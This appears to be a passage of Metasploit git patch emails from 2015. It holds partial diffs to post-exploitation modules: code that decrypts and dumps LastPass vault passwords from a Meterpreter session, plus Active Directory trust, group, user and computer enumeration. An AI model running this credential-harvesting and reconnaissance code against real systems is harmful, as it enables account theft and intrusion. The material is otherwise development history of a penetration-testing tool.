lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" else # IE path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + ".sotp" end - otpbin = read_remote_file(path) if file_exists?(path) #Read file if it exists + otpbin = read_remote_file(path) if file_exists?(path) # Read file if it exists otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) return otpbin else # Chrome, Safari and Opera db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT type, data FROM LastPassData " \ - "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'otp'" + "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'otp'" ) return (result.blank? || result[0][1].blank?) ? nil : [result[0][1]].pack("H*") end end - def derive_vault_key_from_creds username, password, key_iteration_count + def derive_vault_key_from_creds(username, password, key_iteration_count) if key_iteration_count == 1 - key = Digest::SHA256.hexdigest username + password + key = Digest::SHA256.hexdigest username + password else - key = pbkdf2(password, username, key_iteration_count.to_i, 32).first + key = pbkdf2(password, username, key_iteration_count.to_i, 32).first end key end - def decrypt_vault_key_with_otp username, otpbin + def decrypt_vault_key_with_otp(username, otpbin) vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*" encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otpbin) decrypt_data(vault_key_decryption_key, encrypted_vault_key) @@ -581,14 +579,14 @@ class Metasploit3 < Msf::Post def retrieve_encrypted_vault_key_with_otp username, otpbin # Derive login hash from otp - otp_token = lastpass_sha256( lastpass_sha256( username + otpbin ) + otpbin ) # OTP login hash + otp_token = lastpass_sha256(lastpass_sha256(username + otpbin) + otpbin) # OTP login hash # Make request to LastPass uri = URI('https://lastpass.com/otp.php') request = Net::HTTP::Post.new(uri) request.set_form_data("login" => 1, "xml" => 1, "hash" => otp_token, "otpemail" => URI.escape(username), "outofbandsupported" => 1, "changepw" => otp_token) request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' - response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) {|http| http.request(request) } + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) { |http| http.request(request) } # Parse response encrypted_vault_key = nil @@ -631,21 +629,21 @@ class Metasploit3 < Msf::Post rg = session.railgun pid = session.sys.process.getpid process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) - mem = process.memory.allocate(data.length+200) + mem = process.memory.allocate(data.length + 200) process.memory.write(mem, data) - if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" - addr = [mem].pack("V") - len = [data.length].pack("V") - ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) - len, addr = ret["pDataOut"].unpack("V2") + if session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86" + addr = [mem].pack("V") + len = [data.length].pack("V") + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) + len, addr = ret["pDataOut"].unpack("V2") else - addr = Rex::Text.pack_int64le(mem) - len = Rex::Text.pack_int64le(data.length) - ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) - pData = ret["pDataOut"].unpack("VVVV") - len = pData[0] + (pData[1] << 32) - addr = pData[2] + (pData[3] << 32) + addr = Rex::Text.pack_int64le(mem) + len = Rex::Text.pack_int64le(data.length) + ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) + pData = ret["pDataOut"].unpack("VVVV") + len = pData[0] + (pData[1] << 32) + addr = pData[2] + (pData[3] << 32) end return "" if len == 0 @@ -661,7 +659,7 @@ class Metasploit3 < Msf::Post 'Indent' => 1, 'Columns' => %w(URL Username Password) ) - if user_data['vault_loot'] == nil # Was a vault found? + if user_data['vault_loot'].nil? # Was a vault found? print_error "No vault was found for #{username}" next end @@ -679,8 +677,8 @@ class Metasploit3 < Msf::Post # Parse vault vault = Base64.decode64(encoded_vault) vault.scan(/ACCT/) do |result| - chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1]+3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk - chunk = vault[$~.offset(0)[0]..$~.offset(0)[1]+chunk_length] # Get ACCT chunk + chunk_length = vault[$~.offset(0)[1]..$~.offset(0)[1] + 3].unpack("H*").first.to_i(16) # Get the length in base 10 of the ACCT chunk + chunk = vault[$~.offset(0)[0]..$~.offset(0)[1] + chunk_length] # Get ACCT chunk account_data = parse_vault_account(chunk, user_data['vault_key']) lastpass_vault_data_table << account_data if account_data != nil end @@ -694,15 +692,15 @@ class Metasploit3 < Msf::Post end end - def parse_vault_account(chunk, vaultKey) + def parse_vault_account(chunk, vault_key) pointer = 22 # Starting position to find data to decrypt labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"] vault_data = [] for label in labels - length = chunk[pointer..pointer+3].unpack("H*").first.to_i(16) - encrypted_data = chunk[pointer+4..pointer+4+length-1] - label != "url" ? decrypted_data = decrypt_vault_password(vaultKey, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") - decrypted_data = "" if decrypted_data == nil + length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16) + encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1] + label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*") + decrypted_data = "" if decrypted_data.nil? vault_data << decrypted_data if (label == "url" || label == "username" || label == "password") pointer = pointer + 4 + length end @@ -732,8 +730,8 @@ class Metasploit3 < Msf::Post # Reads a remote file and loots it def loot_file(path, data, title, type, description) - data = read_remote_file(path) if data == nil # If no data is passed, read remote file - return nil if data == nil + data = read_remote_file(path) if data.nil? # If no data is passed, read remote file + return nil if data.nil? loot_path = store_loot( title, @@ -762,9 +760,9 @@ class Metasploit3 < Msf::Post begin root_key, base_key = session.sys.registry.splitkey(key) reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) - return nil if not reg_key + return nil unless reg_key reg_value = reg_key.query_value(value) - return nil if not reg_value + return nil unless reg_value rescue vprint_error "Error reading registry key #{key} and value #{value}" end @@ -781,7 +779,7 @@ class Metasploit3 < Msf::Post db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT data FROM LastPassData " \ - "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'key'" + "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'key'" ) encrypted_vault_key = result[0][0] end From 924017e60655fb808cb29494f8c68efd42f20bc7 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 19:46:20 +0000 Subject: [PATCH 129/686] Moved trust enumeration to separate PR --- modules/post/windows/gather/enum_ad_trusts.rb | 159 ------------------ 1 file changed, 159 deletions(-) delete mode 100644 modules/post/windows/gather/enum_ad_trusts.rb diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb deleted file mode 100644 index da1589077e..0000000000 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ /dev/null @@ -1,159 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'rex' -require 'msf/core' -require 'msf/core/auxiliary/report' - -class Metasploit3 < Msf::Post - include Msf::Auxiliary::Report - include Msf::Post::Windows::LDAP - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Enumerate Active Directory Trusts From Current Domain', - 'Description' => %q( - This module will enumerate AD trusts from the current domain, including decoding - of the remote SIDs. This could be particularly useful when creating golden tickets - with a SID history, or just to immediately map the available trusts. - ), - 'License' => MSF_LICENSE, - 'Platform' => ['win'], - 'SessionTypes' => ['meterpreter'], - 'Author' => ['Stuart Morgan '] - )) - - register_options([ - OptInt.new('MAX_SEARCH', [true, 'Maximum number of trusts.', '100']) - ], self.class) - end - - def run - ldap_fields = ['flatname', 'cn', 'securityIdentifier', 'trustAttributes', 'trustDirection', 'trustType', 'distinguishedName'] - ldap_names = ['Name', 'Domain', 'SID', 'Attributes', 'Direction', 'Trust Type', 'DN'] - search_filter = '(objectClass=trustedDomain)' - max_search = datastore['MAX_SEARCH'] - - begin - trust_results = query(search_filter, max_search, ldap_fields) - rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error(e.message) - return - end - - if trust_results.nil? || trust_results[:results].empty? - print_error('No trusts found') - return - end - - num = trust_results[:results].size - - # Draw the results table with the - results_table = Rex::Ui::Text::Table.new( - 'Header' => "#{num} Domain Trust(s)", - 'Indent' => 1, - 'SortIndex' => -1, - 'Columns' => ldap_names - ) - - trust_results[:results].each do |result| - row = [] - - # Go through each of the fields translating each one if necessary - result.each_with_index do |field, index| - if field.nil? - field_value = '' - next - end - - if index == 3 # trustAttributes - field_value = translate_trust_attributes(field[:value]) - elsif index == 4 # trustDirection - field_value = translate_trust_direction(field[:value]) - elsif index == 5 # trustType - field_value = translate_trust_type(field[:value]) - elsif index == 2 # SID - field_value = sid_hex_to_string(field[:value]) - else # Just add the raw data - field_value = field[:value].to_s - end - - row << field_value - end - - # Add the row to the results table - results_table << row - end - - # Draw the whole table - print_line results_table.to_s - end - - # Translate the trustAttributes parameter - # https://msdn.microsoft.com/en-us/library/cc223779.aspx - def translate_trust_attributes(val_original) - val = val_original.to_i - result = [] - result << 'Non Transitive' if val & 0x00000001 - result << 'Uplevel Only' if val & 0x00000002 - result << 'Quarantined' if val & 0x00000004 - result << 'Transitive' if val & 0x00000008 - result << 'Cross Organisation' if val & 0x00000010 - result << 'Within Forest' if val & 0x00000020 - result << 'Treat As External' if val & 0x00000040 - result << 'Uses RC4 Encryption' if val & 0x00000080 - result << 'No TGT Delegation' if val & 0x00000200 - result << 'PIM Trust' if val & 0x00000400 - return '' unless result.nil? - result.join(',') - end - - # Translate the trustDirection parameter - # https://msdn.microsoft.com/en-us/library/cc223768.aspx - def translate_trust_direction(val) - result = '' - result = 'Disabled' if val == 0x00000000 - result = 'Inbound' if val == 0x00000001 - result = 'Outbound' if val == 0x00000002 - result = 'Bidirectional' if val == 0x00000003 - result - end - - # Translate the trustType parameter - # https://msdn.microsoft.com/en-us/library/cc223771.aspx - def translate_trust_type(val) - result = '' - result = 'Downlevel (No AD)' if val == 0x00000001 - result = 'Uplevel (AD)' if val == 0x00000002 - result = 'MIT (Not Windows)' if val == 0x00000003 - result = 'DCE (Historic)' if val == 0x00000004 - result - end - - # Convert the SID from Hex to printable string. - # https://msdn.microsoft.com/en-us/library/cc223778.aspx - # Byte [1]: SID structure revision (always 1, but it could change in the future). - # Byte [2]: The number of sub-authorities in the SID. (i.e. the number of blocks from byte 10 onwards) - # Bytes [3-9]: Identifier Authority - convert to hex as the second number group. - # The rest: A variable length list of unsigned 32bit integers, the number of which is defined in byte 2. - # i.e. S-[1]-[3-9]-[10+] < the number of '10+' groups is defined by [2] - def sid_hex_to_string(data) - sid = [] - sid << data[0].to_s - rid = '' - (6).downto(1) do |i| - rid += byte2hex(data[i, 1][0]) - end - sid << rid.to_i.to_s - sid += data.unpack("bbbbbbbbV*")[8..-1] - "S-" + sid.join('-') - end - - def byte2hex(b) - ret = '%x' % (b.to_i & 0xff) - ret = '0' + ret if ret.length < 2 - ret - end -end From d79fd9a9f3fd847c4e946851ba691541ccfa49f7 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 19:53:36 +0000 Subject: [PATCH 130/686] Renamed the comments attribute to comment --- .../windows/gather/ad_groupusers_to_sql.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 24c4b75aa3..2c1ce1c453 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin - group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comments'] + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment'] if datastore['GROUP_FILTER'].empty? group_query = "(objectClass=group)" else @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Groups retrieval completed: #{groups[:results].size} group(s)" vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comments', 'title', 'accountExpires', 'adminCount'] + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comment', 'title', 'accountExpires', 'adminCount'] remaining_groups = groups[:results] @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post g_description: individual_group[6][:value].encode('UTF-8'), g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, - g_comments: individual_group[9][:value].encode('UTF-8'), + g_comment: individual_group[9][:value].encode('UTF-8'), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Post u_whenCreated: group_user[10][:value].encode('UTF-8'), u_primaryGroupID: group_user[11][:value].to_i, u_badPwdCount: group_user[12][:value].to_i, - u_comments: group_user[13][:value].encode('UTF-8'), + u_comment: group_user[13][:value].encode('UTF-8'), u_title: group_user[14][:value].encode('UTF-8'), u_accountExpires: group_user[15][:value].to_i, # Indicates that a given object has had its ACLs changed to a more secure value by the @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Post vprint_status "Retrieving computers" begin computer_filter = '(objectClass=computer)' - computer_fields = ['distinguishedName', 'objectSid', 'cn', 'dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comments'] + computer_fields = ['distinguishedName', 'objectSid', 'cn', 'dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comment'] computers = query(computer_filter, max_search, computer_fields) computers[:results].each do |comp| @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Post c_operatingSystemServicePack: comp[14][:value].encode('UTF-8'), c_operatingSystemVersion: comp[15][:value].encode('UTF-8'), c_description: comp[16][:value].encode('UTF-8'), - c_comments: comp[17][:value].encode('UTF-8'), + c_comment: comp[17][:value].encode('UTF-8'), # The login script is executed c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. @@ -395,7 +395,7 @@ class Metasploit3 < Msf::Post 'c_primaryGroupID INTEGER,'\ 'c_badPwdCount INTEGER,'\ 'c_description TEXT,'\ - 'c_comments TEXT,'\ + 'c_comment TEXT,'\ 'c_operatingSystem TEXT,'\ 'c_operatingSystemServicePack TEXT,'\ 'c_operatingSystemVersion TEXT,'\ @@ -445,7 +445,7 @@ class Metasploit3 < Msf::Post 'g_groupType INTEGER,'\ 'g_adminCount INTEGER,'\ 'g_description TEXT,'\ - 'g_comments TEXT,'\ + 'g_comment TEXT,'\ 'g_whenChanged TEXT,'\ 'g_whenCreated TEXT,'\ 'g_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ @@ -485,7 +485,7 @@ class Metasploit3 < Msf::Post 'u_adminCount INTEGER,'\ 'u_badPwdCount INTEGER,'\ 'u_userPrincipalName TEXT UNIQUE,'\ - 'u_comments TEXT,'\ + 'u_comment TEXT,'\ 'u_title TEXT,'\ 'u_whenCreated TEXT,'\ 'u_whenChanged TEXT,'\ From 28e563659f1531ef2e5156e8161a12af3e60c56f Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 20:16:18 +0000 Subject: [PATCH 131/686] Added managedBy to group acquisition --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 2c1ce1c453..56441ab98e 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin - group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment'] + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy'] if datastore['GROUP_FILTER'].empty? group_query = "(objectClass=group)" else @@ -106,6 +106,7 @@ class Metasploit3 < Msf::Post g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, g_comment: individual_group[9][:value].encode('UTF-8'), + g_managedBy: individual_group[10][:value].encode('UTF-8'), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -166,7 +167,7 @@ class Metasploit3 < Msf::Post u_badPwdCount: group_user[12][:value].to_i, u_comment: group_user[13][:value].encode('UTF-8'), u_title: group_user[14][:value].encode('UTF-8'), - u_accountExpires: group_user[15][:value].to_i, + u_cn: group_user[15][:value].to_s.encode('UTF-8'), # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, @@ -446,6 +447,7 @@ class Metasploit3 < Msf::Post 'g_adminCount INTEGER,'\ 'g_description TEXT,'\ 'g_comment TEXT,'\ + 'g_managedBy TEXT,'\ 'g_whenChanged TEXT,'\ 'g_whenCreated TEXT,'\ 'g_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ @@ -481,7 +483,7 @@ class Metasploit3 < Msf::Post 'u_logonCount INTEGER,'\ 'u_userAccountControl INTEGER,'\ 'u_primaryGroupID INTEGER,'\ - 'u_accountExpires INTEGER,'\ + 'u_cn TEXT,'\ 'u_adminCount INTEGER,'\ 'u_badPwdCount INTEGER,'\ 'u_userPrincipalName TEXT UNIQUE,'\ From 4ed32ad3e8234651a2dc3f0c4534ad83d8504330 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 22:51:37 +0000 Subject: [PATCH 132/686] Add manager user attribute --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 56441ab98e..e3d358b104 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post # Go through each of the groups and identify the individual users in each group vprint_status "Groups retrieval completed: #{groups[:results].size} group(s)" vprint_status "Retrieving AD Group Membership" - users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comment', 'title', 'accountExpires', 'adminCount'] + users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comment', 'title', 'cn', 'adminCount', 'manager'] remaining_groups = groups[:results] @@ -171,6 +171,7 @@ class Metasploit3 < Msf::Post # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, + u_manager: group_user[17][:value].to_s.encode('UTF-8'), # The login script is executed u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. @@ -489,6 +490,7 @@ class Metasploit3 < Msf::Post 'u_userPrincipalName TEXT UNIQUE,'\ 'u_comment TEXT,'\ 'u_title TEXT,'\ + 'u_manager TEXT,'\ 'u_whenCreated TEXT,'\ 'u_whenChanged TEXT,'\ 'u_ADS_UF_SCRIPT INTEGER,'\ From 76f99cbc7f23d21809fc7465f27371519fb80707 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 11:11:01 +0000 Subject: [PATCH 133/686] Fixing UTF-8 encoding errors with some strangely named groups --- .../windows/gather/ad_groupusers_to_sql.rb | 60 +++++++++---------- 1 file changed, 30 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index e3d358b104..f371879988 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -97,16 +97,16 @@ class Metasploit3 < Msf::Post # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965 sql_param_group = { g_rid: group_rid, - g_distinguishedName: individual_group[0][:value].encode('UTF-8'), + g_distinguishedName: individual_group[0][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), g_sAMAccountType: sat_int, - g_sAMAccountName: individual_group[3][:value].encode('UTF-8'), - g_whenChanged: individual_group[4][:value].encode('UTF-8'), - g_whenCreated: individual_group[5][:value].encode('UTF-8'), - g_description: individual_group[6][:value].encode('UTF-8'), + g_sAMAccountName: individual_group[3][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_whenChanged: individual_group[4][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_whenCreated: individual_group[5][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_description: individual_group[6][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, - g_comment: individual_group[9][:value].encode('UTF-8'), - g_managedBy: individual_group[10][:value].encode('UTF-8'), + g_comment: individual_group[9][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_managedBy: individual_group[10][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), # Specifies a group that is created by the system. g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -153,25 +153,25 @@ class Metasploit3 < Msf::Post # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { u_rid: user_rid, - u_distinguishedName: group_user[0][:value].encode('UTF-8'), + u_distinguishedName: group_user[0][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), u_sAMAccountType: group_user[2][:value].to_i, - u_sAMAccountName: group_user[3][:value].encode('UTF-8'), - u_displayName: group_user[4][:value].encode('UTF-8'), - u_description: group_user[5][:value].encode('UTF-8'), + u_sAMAccountName: group_user[3][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_displayName: group_user[4][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_description: group_user[5][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), u_logonCount: group_user[6][:value].to_i, u_userAccountControl: uac_int, - u_userPrincipalName: group_user[8][:value].encode('UTF-8'), - u_whenChanged: group_user[9][:value].encode('UTF-8'), - u_whenCreated: group_user[10][:value].encode('UTF-8'), + u_userPrincipalName: group_user[8][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_whenChanged: group_user[9][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_whenCreated: group_user[10][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), u_primaryGroupID: group_user[11][:value].to_i, u_badPwdCount: group_user[12][:value].to_i, - u_comment: group_user[13][:value].encode('UTF-8'), - u_title: group_user[14][:value].encode('UTF-8'), - u_cn: group_user[15][:value].to_s.encode('UTF-8'), + u_comment: group_user[13][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_title: group_user[14][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + u_cn: group_user[15][:value].to_s.encode('UTF-8',:invalid=>:replace,:replace=>"?"), # Indicates that a given object has had its ACLs changed to a more secure value by the # system because it was a member of one of the administrative groups (directly or transitively). u_adminCount: group_user[16][:value].to_i, - u_manager: group_user[17][:value].to_s.encode('UTF-8'), + u_manager: group_user[17][:value].to_s.encode('UTF-8',:invalid=>:replace,:replace=>"?"), # The login script is executed u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Post # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. # Also add the sAMAccount type flags from https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx sql_param_computer = { c_rid: computer_rid, - c_distinguishedName: comp[0][:value].encode('UTF-8'), - c_cn: comp[2][:value].encode('UTF-8'), - c_dNSHostName: comp[3][:value].encode('UTF-8'), + c_distinguishedName: comp[0][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_cn: comp[2][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_dNSHostName: comp[3][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), c_sAMAccountType: sat_int, - c_sAMAccountName: comp[5][:value].encode('UTF-8'), - c_displayName: comp[6][:value].encode('UTF-8'), + c_sAMAccountName: comp[5][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_displayName: comp[6][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), c_logonCount: comp[7][:value].to_i, c_userAccountControl: uac_int, - c_whenChanged: comp[9][:value].encode('UTF-8'), - c_whenCreated: comp[10][:value].encode('UTF-8'), + c_whenChanged: comp[9][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_whenCreated: comp[10][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), c_primaryGroupID: comp[11][:value].to_i, c_badPwdCount: comp[12][:value].to_i, - c_operatingSystem: comp[13][:value].encode('UTF-8'), - c_operatingSystemServicePack: comp[14][:value].encode('UTF-8'), - c_operatingSystemVersion: comp[15][:value].encode('UTF-8'), - c_description: comp[16][:value].encode('UTF-8'), - c_comment: comp[17][:value].encode('UTF-8'), + c_operatingSystem: comp[13][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_operatingSystemServicePack: comp[14][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_operatingSystemVersion: comp[15][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_description: comp[16][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + c_comment: comp[17][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), # The login script is executed c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, # The user account is disabled. From d8b3b15da6008d2337b80ead96be4099da5d3014 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Mon, 21 Dec 2015 11:43:12 +0000 Subject: [PATCH 134/686] Trying to fix encoding errors --- .../windows/gather/ad_groupusers_to_sql.rb | 60 +++++++++---------- 1 file changed, 30 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index f371879988..06061fc0db 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -97,16 +97,16 @@ class Metasploit3 < Msf::Post # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965 sql_param_group = { g_rid: group_rid, - g_distinguishedName: individual_group[0][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_distinguishedName: individual_group[0][:value].encode('UTF-8').scrub, g_sAMAccountType: sat_int, - g_sAMAccountName: individual_group[3][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - g_whenChanged: individual_group[4][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - g_whenCreated: individual_group[5][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), - g_description: individual_group[6][:value].encode('UTF-8',:invalid=>:replace,:replace=>"?"), + g_sAMAccountName: individual_group[3][:value].encode('UTF-8').scrub, + g_whenChanged: individual_group[4][:value].encode('UTF-8').scrub, + g_whenCreated: individual_group[5][:value].encode('UTF-8').scrub, + g_description: individual_group[6][:value].encode('UTF-8').scrub, g_groupType: grouptype_int, g_adminCount: individual_group[8][:value].to_i, - g_comment: 